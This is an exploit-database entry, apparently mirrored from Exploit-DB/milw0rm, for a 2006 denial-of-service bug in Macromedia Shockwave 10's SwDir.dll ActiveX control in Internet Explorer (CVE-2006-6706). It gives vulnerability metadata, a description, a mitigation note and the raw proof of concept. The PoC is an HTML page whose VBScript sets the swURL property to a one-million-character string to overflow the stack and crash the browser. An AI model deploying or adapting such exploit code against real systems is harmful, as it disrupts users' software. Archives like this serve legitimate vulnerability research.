header-logo
Suggest Exploit
vendor:
Shockwave Player
by:
shinnai
7.5
CVSS
HIGH
Denial of Service
119
CWE
Product Name: Shockwave Player
Affected Version From: Macromedia Shockwave 10
Affected Version To: Macromedia Shockwave 10
Patch Exists: YES
Related CWE: CVE-2006-6706
CPE: a:macromedia:shockwave_player:10.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP
2006

Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service

This exploit causes a denial of service in Internet Explorer when a maliciously crafted Shockwave file is opened. The vulnerability is caused due to a boundary error in the handling of Shockwave files. This can be exploited to cause a stack-based buffer overflow by passing an overly long argument to the swURL property of the Shockwave ActiveX control.

Mitigation:

Upgrade to the latest version of Macromedia Shockwave 10
Source

Exploit-DB raw data:

<!--
---------------------------------------------------------------------------
Macromedia Shockwave 10 (SwDir.dll) Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->

<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258' id='ShockW'></object>
<script language='vbscript'>

argCount = 1

arg1=String(1000000, "A")

ShockW.swURL = arg1

</script>

# milw0rm.com [2006-12-29]

Navigation

Suggest Exploit

Services By CQR